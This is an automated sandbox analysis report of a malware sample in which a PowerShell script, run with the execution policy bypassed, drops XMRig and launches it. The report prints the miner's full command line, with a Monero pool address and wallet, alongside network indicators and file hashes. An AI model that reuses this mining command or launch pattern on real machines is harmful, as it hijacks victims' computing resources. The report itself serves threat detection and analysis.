Analysis Overview
SHA256
4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Threat Level: Known bad
The file main3.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-04 03:15
Signatures
Analysis: behavioral28
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win11-20240611-en
Max time kernel
1799s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3560 wrote to memory of 2816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3560 wrote to memory of 2816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/3560-0-0x00007FF9A5473000-0x00007FF9A5475000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ryp13uya.yyy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3560-6-0x000002130D050000-0x000002130D072000-memory.dmp
memory/3560-10-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp
memory/3560-11-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp
memory/3560-12-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp
memory/3560-14-0x00000213258B0000-0x00000213258C2000-memory.dmp
memory/3560-15-0x0000021325890000-0x000002132589A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2816-46-0x000001A085290000-0x000001A0852B0000-memory.dmp
memory/2816-47-0x000001A0852E0000-0x000001A085300000-memory.dmp
memory/2816-48-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-49-0x000001A086AB0000-0x000001A086AD0000-memory.dmp
memory/2816-50-0x000001A086AD0000-0x000001A086AF0000-memory.dmp
memory/2816-51-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/3560-52-0x00007FF9A5473000-0x00007FF9A5475000-memory.dmp
memory/3560-53-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp
memory/2816-54-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-55-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-57-0x000001A086AD0000-0x000001A086AF0000-memory.dmp
memory/2816-56-0x000001A086AB0000-0x000001A086AD0000-memory.dmp
memory/2816-58-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-59-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-60-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-61-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-62-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-63-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-64-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-65-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-66-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-67-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-68-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-69-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-70-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-71-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-72-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-73-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-74-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-75-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-76-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-77-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-78-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-79-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-80-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-81-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-82-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-83-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-84-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-85-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-86-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-87-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-88-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-89-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-90-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-91-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-92-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-93-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-94-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-95-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-96-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-97-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-98-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-99-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-100-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-101-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-102-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-103-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-104-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-105-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-106-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-107-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-108-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-109-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-110-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-111-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-112-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-113-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-114-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-115-0x00007FF612300000-0x00007FF612F33000-memory.dmp
memory/2816-116-0x00007FF612300000-0x00007FF612F33000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:21
Platform
win10v2004-20240611-en
Max time kernel
1791s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4176 wrote to memory of 5100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4176 wrote to memory of 5100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
memory/4176-0-0x00007FFEDEBB3000-0x00007FFEDEBB5000-memory.dmp
memory/4176-6-0x000001F955CB0000-0x000001F955CD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gcjptdi4.pmo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4176-11-0x00007FFEDEBB0000-0x00007FFEDF671000-memory.dmp
memory/4176-12-0x00007FFEDEBB0000-0x00007FFEDF671000-memory.dmp
memory/4176-14-0x00007FFEDEBB0000-0x00007FFEDF671000-memory.dmp
memory/4176-15-0x000001F956A80000-0x000001F956A92000-memory.dmp
memory/4176-16-0x000001F956A60000-0x000001F956A6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5100-47-0x0000020E5E500000-0x0000020E5E520000-memory.dmp
memory/5100-48-0x0000020E5E540000-0x0000020E5E560000-memory.dmp
memory/5100-49-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-51-0x0000020E5E580000-0x0000020E5E5A0000-memory.dmp
memory/5100-50-0x0000020E5E560000-0x0000020E5E580000-memory.dmp
memory/4176-54-0x00007FFEDEBB0000-0x00007FFEDF671000-memory.dmp
memory/5100-52-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/4176-53-0x00007FFEDEBB3000-0x00007FFEDEBB5000-memory.dmp
memory/5100-55-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/4176-56-0x00007FFEDEBB0000-0x00007FFEDF671000-memory.dmp
memory/5100-57-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-59-0x0000020E5E580000-0x0000020E5E5A0000-memory.dmp
memory/5100-58-0x0000020E5E560000-0x0000020E5E580000-memory.dmp
memory/5100-60-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-61-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-62-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-63-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-64-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-65-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-66-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-67-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-68-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-69-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-70-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-71-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-72-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-73-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-74-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-75-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-76-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-77-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-78-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-79-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-80-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-81-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-82-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-83-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-84-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-85-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-86-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-87-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-88-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-89-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-90-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-91-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-92-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-93-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-94-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-95-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-96-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-97-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-98-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-99-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-100-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-101-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-102-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-103-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-104-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-105-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-106-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-107-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-108-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-109-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-110-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-111-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-112-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-113-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-114-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-115-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-116-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-117-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
memory/5100-118-0x00007FF7E2CA0000-0x00007FF7E38D3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10v2004-20240611-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
